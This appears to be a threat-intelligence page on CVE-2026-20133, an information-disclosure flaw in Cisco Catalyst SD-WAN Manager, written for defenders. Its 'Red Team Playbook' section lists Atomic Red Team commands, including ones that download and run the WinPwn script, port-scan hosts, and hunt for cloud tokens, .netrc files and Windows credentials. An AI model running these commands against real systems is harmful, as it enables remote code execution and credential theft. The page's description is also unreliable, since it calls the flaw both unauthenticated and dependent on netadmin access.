CVE-2026-20133
Overview
This vulnerability is an information disclosure flaw caused by insufficient file system access controls within Cisco Catalyst SD-WAN Manager. The root cause lies in the improper enforcement of access restrictions on API endpoints, allowing unauthorized read access to sensitive files on the underlying operating system. The affected component is the API interface of the Cisco Catalyst SD-WAN Manager software.
Vulnerability Description
A vulnerability in Cisco Catalyst SD-WAN Software could allow an unauthenticated, remote attacker to view sensitive information on an affected system. This vulnerability is due to insufficient file system restrictions. An authenticated attacker with netadmin privileges could exploit this vulnerability by accessing the vshell of an affected system. A successful exploit could allow the attacker to read sensitive information on the underlying operating system.
Impact
An unauthenticated attacker can remotely access sensitive information stored on the underlying operating system of the affected Cisco Catalyst SD-WAN Manager without needing valid credentials or user interaction. This exposure can lead to the disclosure of confidential configuration data, credentials, or other critical system details, potentially enabling further attacks or unauthorized lateral movement within the network. The business impact includes data breaches and compromise of network management confidentiality.
Solution
Cisco has released security updates addressing this vulnerability in Cisco Catalyst SD-WAN Manager version 20.12.6 and later. Administrators are advised to apply the patches as detailed in Cisco Security Advisory cisco-sa-sdwan-authbp-qwCX8D4v available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v. No specific workarounds are provided; timely application of the vendor-supplied updates is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Cisco Catalyst SD-WAN Manager stems from insufficient file system access restrictions, which allows unauthenticated remote attackers to potentially access sensitive information stored on the underlying operating system. This weakness arises from the way the system manages its API, failing to enforce adequate access controls that would typically restrict unauthorized users from retrieving sensitive data. As a result, an attacker could exploit this flaw by directly interfacing with the API, gaining visibility into confidential information that should otherwise be protected from external access.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage tools and scripts to send crafted requests to the API endpoints of the affected system. Given that the vulnerability does not require authentication, the barrier to entry is significantly lowered, making it easier for malicious actors to execute their attacks. Once access is gained, the attacker can read sensitive information, which may include configuration files, user credentials, or other critical data that could be leveraged for further attacks, such as lateral movement within the network or data exfiltration.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely on Cisco's SD-WAN Manager for their network operations. The exposure of sensitive information can lead to severe business risks, including data breaches, loss of customer trust, and potential regulatory penalties. For instance, if an attacker were to gain access to user credentials, they could impersonate legitimate users, leading to unauthorized actions within the network. Additionally, the compromised information could be sold on the dark web or used to launch further targeted attacks against the organization or its clients, thereby amplifying the overall risk.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular security assessments and penetration testing should be conducted to identify potential weaknesses in the system. Monitoring API access logs for unusual patterns can also help in detecting unauthorized access attempts. Furthermore, organizations should ensure that they are running the latest version of the affected software, as vendors often release patches to address known vulnerabilities. In addition to applying patches, implementing strict access controls and network segmentation can limit the potential impact of an exploit. Employing security best practices, such as the principle of least privilege, can further reduce the attack surface and enhance the overall security posture of the organization.
In conclusion, the vulnerability in Cisco Catalyst SD-WAN Manager presents a significant risk due to its potential for unauthorized access to sensitive information. The ease of exploitation combined with the critical nature of the data at stake underscores the importance of proactive security measures. Organizations must remain vigilant, continuously assess their security environments, and implement robust mitigation strategies to protect against such vulnerabilities. By doing so, they can safeguard their assets and maintain the integrity of their operations in an increasingly complex threat landscape.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-20133, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s elevated priority within the cybersecurity community and signals increased attention from both defenders and potential adversaries. The assignment of a CVSS score of 7.5, alongside a significant uptick in the Exploit Prediction Scoring System (EPSS) rating, reflects growing confidence in the exploitability of this flaw. Our telemetry indicates a rapid increase in attempts to probe affected Cisco Catalyst SD-WAN Manager systems, suggesting that threat actors are actively exploring or leveraging this vulnerability to access sensitive information remotely without authentication. Although no new exploit code has been publicly disclosed, the surge in reconnaissance and scanning activity elevates the risk profile considerably. For defenders, this means that the window for proactive detection and response is narrowing, and the likelihood of successful exploitation in operational environments is rising. Consequently, the threat level associated with CVE-2026-20133 should be reassessed as high, with urgency placed on monitoring and hardening affected assets to mitigate potential data exposure.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in reconnaissance and scanning activity targeting CVE-2026-20133, indicating increased adversary interest in this vulnerability. Despite the downward revision of the CVSS score to 6.5 and a corresponding decrease in the EPSS score, the surge in detection events suggests that threat actors are actively probing affected Cisco Catalyst SD-WAN Manager systems. This heightened activity, coupled with the vulnerability’s ability to expose sensitive information without requiring authentication, underscores an elevated risk of data compromise in operational environments. While no new exploit code or ransomware linkage has emerged, the intensified probing narrows the window for defenders to detect and respond effectively. Consequently, the overall threat level should be considered elevated, warranting increased vigilance in monitoring and threat hunting efforts to identify potential exploitation attempts promptly.
Update 3 — May 24, 2026
Recent updates to CVE-2026-20133 reveal a recalibration of its CVSS score from 6.5 to 7.5, reflecting a reassessment of the vulnerability’s potential impact and exploitability. Concurrently, our telemetry indicates a marked increase in the Exploit Prediction Scoring System (EPSS) value by nearly 40%, signaling a growing likelihood of exploitation attempts in the near term. Interestingly, this quantitative rise contrasts with a significant reduction in detection activity observed across our sensors, suggesting either a shift in attacker tactics toward stealthier operations or a temporary lull in overt exploitation attempts. The inclusion of this vulnerability in the KEV catalog further underscores its criticality and prioritization by cybersecurity authorities. Although no new exploit code or ransomware associations have been identified, the elevated CVSS and EPSS scores, combined with the KEV listing, heighten the urgency for defenders to maintain heightened situational awareness. This evolving profile indicates an increased threat level, with a narrower window for detection and response, emphasizing the need for continuous monitoring despite the current dip in observable exploitation activity.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | 20.12.6 |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:20.12.6:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-20133 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20133 |